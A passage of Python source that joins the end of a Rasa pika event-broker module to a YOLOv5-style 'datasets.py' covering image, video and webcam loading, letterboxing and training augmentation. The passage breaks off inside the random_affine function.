client_certificate_path, client_key_path, ca_file_path, key_password
)
return pika.SSLOptions(ssl_context, rabbitmq_host)
else:
return None
class PikaProducer(PikaEventBroker):
def __init__(
self,
host: Text,
username: Text,
password: Text,
port: Union[int, Text] = 5672,
queues: Union[List[Text], Tuple[Text], Text, None] = ("rasa_core_events",),
should_keep_unpublished_messages: bool = True,
raise_on_failure: bool = False,
log_level: Union[Text, int] = os.environ.get(
ENV_LOG_LEVEL_LIBRARIES, DEFAULT_LOG_LEVEL_LIBRARIES
),
**kwargs: Any,
):
raise_warning(
"The `PikaProducer` class is deprecated, please inherit "
"from `PikaEventBroker` instead. `PikaProducer` will be "
"removed in future Rasa versions.",
FutureWarning,
docs=DOCS_URL_PIKA_EVENT_BROKER,
)
super(PikaProducer, self).__init__(
host,
username,
password,
port,
queues,
should_keep_unpublished_messages,
raise_on_failure,
log_level,
**kwargs,
)
|
datasets.py
|
import glob
import math
import os
import random
import shutil
import time
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from utils.utils import xyxy2xywh, xywh2xyxy, torch_distributed_zero_first
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.tiff', '.dng']
vid_formats = ['.mov', '.avi', '.mp4', '.mpg', '.mpeg', '.m4v', '.wmv', '.mkv']
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(files):
# Returns a single hash value of a list of files
return sum(os.path.getsize(f) for f in files if os.path.isfile(f))
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
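# Quick illustration (a sketch) of exif_size: the returned (width, height) already accounts
# for the EXIF orientation flag; 'example.jpg' is a placeholder path.
def _exif_size_demo(path='example.jpg'):
    im = Image.open(path)
    return exif_size(im)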
def create_dataloader(path, imgsz, batch_size, stride, opt, hyp=None, augment=False, cache=False, pad=0.0, rect=False,
local_rank=-1, world_size=1):
# Make sure only the first process in DDP processes the dataset first, so the others can use the cache.
with torch_distributed_zero_first(local_rank):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=opt.single_cls,
stride=int(stride),
pad=pad)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count() // world_size, batch_size if batch_size > 1 else 0, 8]) # number of workers
train_sampler = torch.utils.data.distributed.DistributedSampler(dataset) if local_rank != -1 else None
dataloader = torch.utils.data.DataLoader(dataset,
batch_size=batch_size,
num_workers=nw,
sampler=train_sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn)
return dataloader, dataset
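# A minimal sketch of building a training dataloader (a hypothetical `opt` namespace is
# assumed; the path and hyperparameter values below are placeholders, not project defaults).
def _demo_create_dataloader():
    from argparse import Namespace
    opt = Namespace(single_cls=False)
    hyp = {'degrees': 0.0, 'translate': 0.1, 'scale': 0.5, 'shear': 0.0,
           'hsv_h': 0.015, 'hsv_s': 0.7, 'hsv_v': 0.4}
    dataloader, dataset = create_dataloader('data/train.txt', imgsz=640, batch_size=16,
                                            stride=32, opt=opt, hyp=hyp, augment=True)
    for imgs, targets, paths, shapes in dataloader:
        print(imgs.shape, targets.shape)  # e.g. torch.Size([16, 3, 640, 640]) and [n_labels, 6]
        break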
class LoadImages: # for inference
def __init__(self, path, img_size=640):
p = str(Path(path)) # os-agnostic
p = os.path.abspath(p) # absolute path
if '*' in p:
files = sorted(glob.glob(p)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception('ERROR: %s does not exist' % p)
images = [x for x in files if os.path.splitext(x)[-1].lower() in img_formats]
videos = [x for x in files if os.path.splitext(x)[-1].lower() in vid_formats]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'images'
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, 'No images or videos found in %s. Supported formats are:\nimages: %s\nvideos: %s' % \
(p, img_formats, vid_formats)
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print('video %g/%g (%g/%g) %s: ' % (self.count + 1, self.nf, self.frame, self.nframes, path), end='')
else:
# Read image
self.count += 1
# Changed from the original code so that Korean (non-ASCII) file paths can be read
stream = open(path.encode("utf-8"), "rb")
bytes = bytearray(stream.read())
numpyArray = np.asarray(bytes, dtype=np.uint8)
img0 = cv2.imdecode(numpyArray , cv2.IMREAD_UNCHANGED)
# img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print('image %g/%g %s: ' % (self.count, self.nf, path), end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
# cv2.imwrite(path + '.letterbox.jpg', 255 * img.transpose((1, 2, 0))[:, :, ::-1]) # save letterbox image
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
class LoadWebcam: # for inference
def __init__(self, pipe=0, img_size=640):
self.img_size = img_size
if pipe == '0':
pipe = 0 # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:[email protected]/1' # IP camera with login
# pipe = 'rtsp://170.93.143.139/rtplive/470011e600ef003a004ee33696235daa' # IP traffic camera
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
# https://answers.opencv.org/question/215996/changing-gstreamer-pipeline-to-opencv-in-pythonsolved/
# pipe = '"rtspsrc location="rtsp://username:[email protected]/1" latency=10 ! appsink' # GStreamer
# https://answers.opencv.org/question/200787/video-acceleration-gstremer-pipeline-in-videocapture/
# https://stackoverflow.com/questions/54095699/install-gstreamer-support-for-opencv-python-package # install help
# pipe = "rtspsrc location=rtsp://root:[email protected]:554/axis-media/media.amp?videocodec=h264&resolution=3840x2160 protocols=GST_RTSP_LOWER_TRANS_TCP ! rtph264depay ! queue ! vaapih264dec ! videoconvert ! appsink" # GStreamer
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, 'Camera Error %s' % self.pipe
img_path = 'webcam.jpg'
print('webcam %g: ' % self.count, end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=640):
self.mode = 'images'
self.img_size = img_size
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = sources
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print('%g/%g: %s... ' % (i + 1, n, s), end='')
cap = cv2.VideoCapture(0 if s == '0' else s)
assert cap.isOpened(), 'Failed to open %s' % s
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(' success (%gx%g at %.2f FPS).' % (w, h, fps))
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, new_shape=self.img_size)[0].shape for x in self.imgs], 0) # inference shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
_, self.imgs[index] = cap.retrieve()
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, new_shape=self.img_size, auto=self.rect)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0):
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = str(Path(p)) # os-agnostic
parent = str(Path(p).parent) + os.sep
if os.path.isfile(p): # file
with open(p, 'r') as t:
t = t.read().splitlines()
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
elif os.path.isdir(p): # folder
f += glob.iglob(p + os.sep + '*.*')
else:
raise Exception('%s does not exist' % p)
self.img_files = sorted(
[x.replace('/', os.sep) for x in f if os.path.splitext(x)[-1].lower() in img_formats])
except Exception as e:
raise Exception('Error loading data from %s: %s\nSee %s' % (path, e, help_url))
n = len(self.img_files)
assert n > 0, 'No images found in %s. See %s' % (path, help_url)
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.n = n # number of images
self.batch = bi # batch index of image
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
# Define labels
self.label_files = [x.replace('images', 'labels').replace(os.path.splitext(x)[-1], '.txt') for x in
self.img_files]
# Check cache
cache_path = str(Path(self.label_files[0]).parent) + '.cache' # cached labels
if os.path.isfile(cache_path):
cache = torch.load(cache_path) # load
if cache['hash'] != get_hash(self.label_files + self.img_files): # dataset changed
cache = self.cache_labels(cache_path) # re-cache
else:
cache = self.cache_labels(cache_path) # cache
# Get labels
labels, shapes = zip(*[cache[x] for x in self.img_files])
self.shapes = np.array(shapes, dtype=np.float64)
self.labels = list(labels)
# Rectangular Training https://github.com/ultralytics/yolov3/issues/232
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride
# Cache labels
create_datasubset, extract_bounding_boxes, labels_loaded = False, False, False
nm, nf, ne, ns, nd = 0, 0, 0, 0, 0 # number missing, found, empty, datasubset, duplicate
pbar = tqdm(self.label_files)
for i, file in enumerate(pbar):
l = self.labels[i] # label
if l.shape[0]:
assert l.shape[1] == 5, '> 5 label columns: %s' % file
assert (l >= 0).all(), 'negative labels: %s' % file
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels: %s' % file
if np.unique(l, axis=0).shape[0] < l.shape[0]: # duplicate rows
nd += 1 # print('WARNING: duplicate rows in %s' % self.label_files[i]) # duplicate rows
if single_cls:
l[:, 0] = 0 # force dataset into single-class mode
self.labels[i] = l
nf += 1 # file found
# Create subdataset (a smaller dataset)
if create_datasubset and ns < 1E4:
if ns == 0:
create_folder(path='./datasubset')
os.makedirs('./datasubset/images')
exclude_classes = 43
if exclude_classes not in l[:, 0]:
ns += 1
# shutil.copy(src=self.img_files[i], dst='./datasubset/images/') # copy image
with open('./datasubset/images.txt', 'a') as f:
f.write(self.img_files[i] + '\n')
# Extract object detection boxes for a second stage classifier
if extract_bounding_boxes:
p = Path(self.img_files[i])
img = cv2.imread(str(p))
h, w = img.shape[:2]
for j, x in enumerate(l):
f = '%s%sclassifier%s%g_%g_%s' % (p.parent.parent, os.sep, os.sep, x[0], j, p.name)
if not os.path.exists(Path(f).parent):
os.makedirs(Path(f).parent) # make new output folder
b = x[1:] * [w, h, w, h] # box
b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.3 + 30 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(f, img[b[1]:b[3], b[0]:b[2]]), 'Failure extracting classifier boxes'
else:
ne += 1 # print('empty labels for image %s' % self.img_files[i]) # file empty
# os.system("rm '%s' '%s'" % (self.img_files[i], self.label_files[i])) # remove
pbar.desc = 'Scanning labels %s (%g found, %g missing, %g empty, %g duplicate, for %g images)' % (
cache_path, nf, nm, ne, nd, n)
if nf == 0:
s = 'WARNING: No labels found in %s. See %s' % (os.path.dirname(file) + os.sep, help_url)
print(s)
assert not augment, '%s. Can not train without labels.' % s
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs = [None] * n
if cache_images:
gb = 0 # Gigabytes of cached images
pbar = tqdm(range(len(self.img_files)), desc='Caching images')
self.img_hw0, self.img_hw = [None] * n, [None] * n
for i in pbar: # max 10k images
self.imgs[i], self.img_hw0[i], self.img_hw[i] = load_image(self, i) # img, hw_original, hw_resized
gb += self.imgs[i].nbytes
pbar.desc = 'Caching images (%.1fGB)' % (gb / 1E9)
def cache_labels(self, path='labels.cache'):
# Cache dataset labels, check images and read shapes
x = {} # dict
pbar = tqdm(zip(self.img_files, self.label_files), desc='Scanning images', total=len(self.img_files))
for (img, label) in pbar:
try:
l = []
image = Image.open(img)
image.verify() # PIL verify
# _ = io.imread(img) # skimage verify (from skimage import io)
shape = exif_size(image) # image size
assert (shape[0] > 9) & (shape[1] > 9), 'image size <10 pixels'
if os.path.isfile(label):
with open(label, 'r') as f:
l = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32) # labels
if len(l) == 0:
l = np.zeros((0, 5), dtype=np.float32)
x[img] = [l, shape]
except Exception as e:
x[img] = None
print('WARNING: %s: %s' % (img, e))
x['hash'] = get_hash(self.label_files + self.img_files)
torch.save(x, path) # save for next time
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
if self.image_weights:
index = self.indices[index]
hyp = self.hyp
if self.mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
# MixUp https://arxiv.org/pdf/1710.09412.pdf
# if random.random() < 0.5:
# img2, labels2 = load_mosaic(self, random.randint(0, len(self.labels) - 1))
# r = np.random.beta(0.3, 0.3) # mixup ratio, alpha=beta=0.3
# img = (img * r + img2 * (1 - r)).astype(np.uint8)
# labels = np.concatenate((labels, labels2), 0)
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
# Load labels
labels = []
x = self.labels[index]
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + pad[0] # pad width
labels[:, 2] = ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + pad[1] # pad height
labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + pad[0]
labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + pad[1]
if self.augment:
# Augment imagespace
if not self.mosaic:
img, labels = random_affine(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
# convert xyxy to xywh
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5])
# Normalize coordinates 0 - 1
labels[:, [2, 4]] /= img.shape[0] # height
labels[:, [1, 3]] /= img.shape[1] # width
if self.augment:
# random left-right flip
lr_flip = True
if lr_flip and random.random() < 0.5:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
# random up-down flip
ud_flip = False
if ud_flip and random.random() < 0.5:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
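# Illustrative usage sketch (not part of the original file): wrapping the dataset class
# above in a DataLoader. collate_fn is needed because every sample carries a variable
# number of labels; it stacks the images and concatenates the label rows, writing the
# batch index into column 0 so build_targets() can map each box back to its image.
# `dataset` is assumed to be an instance of the dataset class defined above.
def _example_dataloader(dataset, batch_size=16, workers=4):
    from torch.utils.data import DataLoader
    loader = DataLoader(dataset,
                        batch_size=batch_size,
                        num_workers=workers,
                        pin_memory=True,
                        collate_fn=dataset.collate_fn)
    imgs, targets, paths, shapes = next(iter(loader))
    # imgs: (batch, 3, H, W) uint8 tensor; targets: (num_labels, 6) = [batch_idx, cls, x, y, w, h]
    return imgs, targets, paths, shapes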
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
        if r != 1:  # resize whenever r != 1 (INTER_AREA when shrinking without augmentation, else INTER_LINEAR)

interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
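# Worked example (illustrative, not from the original file): for img_size=640 and a
# 1280x960 source image, r = 640 / 1280 = 0.5, so load_image() returns a 640x480 copy
# together with both the original and resized (h, w) for later label rescaling.
def _example_load_image_scaling(h0=960, w0=1280, img_size=640):
    r = img_size / max(h0, w0)       # 0.5
    h, w = int(h0 * r), int(w0 * r)  # 480, 640
    return (h0, w0), (h, w)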
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
# Histogram equalization
# if random.random() < 0.2:
# for i in range(3):
# img[:, :, i] = cv2.equalizeHist(img[:, :, i])
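# Illustrative sketch (not from the original file): augment_hsv() applies its random
# gains through 256-entry lookup tables instead of per-pixel multiplies. Shown here for
# the value channel only, with a fixed gain of 1.2.
def _example_value_lut(gain=1.2):
    x = np.arange(0, 256, dtype=np.int16)
    lut_val = np.clip(x * gain, 0, 255).astype(np.uint8)   # same construction as above
    val = np.array([[0, 100, 250]], dtype=np.uint8)        # a few sample V values
    return cv2.LUT(val, lut_val)                           # -> [[0, 120, 255]]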
def load_mosaic(self, index):
# loads images in a mosaic
labels4 = []
s = self.img_size
yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border] # mosaic center x, y
indices = [index] + [random.randint(0, len(self.labels) - 1) for _ in range(3)] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, max(xc, w), min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
x = self.labels[index]
labels = x.copy()
if x.size > 0: # Normalized xywh to pixel xyxy format
labels[:, 1] = w * (x[:, 1] - x[:, 3] / 2) + padw
labels[:, 2] = h * (x[:, 2] - x[:, 4] / 2) + padh
labels[:, 3] = w * (x[:, 1] + x[:, 3] / 2) + padw
labels[:, 4] = h * (x[:, 2] + x[:, 4] / 2) + padh
labels4.append(labels)
# Concat/clip labels
if len(labels4):
labels4 = np.concatenate(labels4, 0)
# np.clip(labels4[:, 1:] - s / 2, 0, s, out=labels4[:, 1:]) # use with center crop
np.clip(labels4[:, 1:], 0, 2 * s, out=labels4[:, 1:]) # use with random_affine
# Replicate
# img4, labels4 = replicate(img4, labels4)
# Augment
# img4 = img4[s // 2: int(s * 1.5), s // 2:int(s * 1.5)] # center crop (WARNING, requires box pruning)
img4, labels4 = random_affine(img4, labels4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
border=self.mosaic_border) # border to remove
return img4, labels4
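# Illustrative sketch (not from the original file): load_mosaic() pastes four images onto
# a 2s x 2s canvas around a random centre (xc, yc); the negative mosaic_border passed to
# random_affine() above then crops the canvas back down. `dataset` is assumed to be an
# instance of the dataset class above with mosaic enabled.
def _example_mosaic(dataset, index=0):
    img4, labels4 = load_mosaic(dataset, index)
    # with the usual mosaic_border of [-s // 2, -s // 2] the result is roughly s x s
    return img4.shape[:2], len(labels4)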
def replicate(img, labels):
# Replicate labels
h, w = img.shape[:2]
boxes = labels[:, 1:].astype(int)
x1, y1, x2, y2 = boxes.T
s = ((x2 - x1) + (y2 - y1)) / 2 # side length (pixels)
for i in s.argsort()[:round(s.size * 0.5)]: # smallest indices
x1b, y1b, x2b, y2b = boxes[i]
bh, bw = y2b - y1b, x2b - x1b
yc, xc = int(random.uniform(0, h - bh)), int(random.uniform(0, w - bw)) # offset x, y
x1a, y1a, x2a, y2a = [xc, yc, xc + bw, yc + bh]
img[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0)
return img, labels
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True):
    # Resize image to a stride-multiple rectangle (padded to multiples of 64 below) https://github.com/ultralytics/yolov3/issues/232
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, 64), np.mod(dh, 64) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = (new_shape[1], new_shape[0])
ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
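# Worked example (illustrative, not from the original file): letterboxing a 1280x720
# frame to 640x640 with auto=False scales by r = 0.5 to 640x360, then pads
# (640 - 360) / 2 = 140 px of grey above and below, so ratio=(0.5, 0.5) and (dw, dh)=(0, 140).
def _example_letterbox():
    img = np.full((720, 1280, 3), 114, dtype=np.uint8)  # dummy frame
    out, ratio, (dw, dh) = letterbox(img, new_shape=640, auto=False)
    return out.shape, ratio, (dw, dh)                   # -> ((640, 640, 3), (0.5, 0.5), (0.0, 140.0))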
def random_affine(img, targets=(), degrees=10, translate=.1, scale=.1, shear=10, border=(0, 0)):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# https://medium.com/uruvideo/dataset-augmentation-with-random-homographies-a8f4b44830d4
# targets = [cls, xyxy]
height = img.shape[0] + border[0] * 2 # shape(h,w,c)
width = img.shape[1] + border[1] * 2
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(img.shape[1] / 2, img.shape[0] / 2), scale=s)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(-translate, translate) * img.shape[1] + border[1] # x translation (pixels)
T[1, 2] = random.uniform(-translate, translate) * img.shape[0] + border[0] # y translation (pixels)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Combined rotation matrix
M = S @ T @ R # ORDER IS IMPORTANT HERE!!
if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed
img = cv2.warpAffine(img, M[:2], dsize=(width, height), flags=cv2.INTER_LINEAR, borderValue=(114, 114, 114))
# Transform label coordinates
n = len(targets)
if n:
# warp points
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = (xy @ M.T)[:, :2].reshape(n, 8)
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# # apply angle-based reduction of bounding boxes
# radians = a * math.pi / 180
# reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
# x = (xy[:, 2] + xy[:, 0]) / 2
# y = (xy[:, 3] + xy[:, 1]) / 2
# w = (xy[:, 2] - xy[:, 0]) * reduction
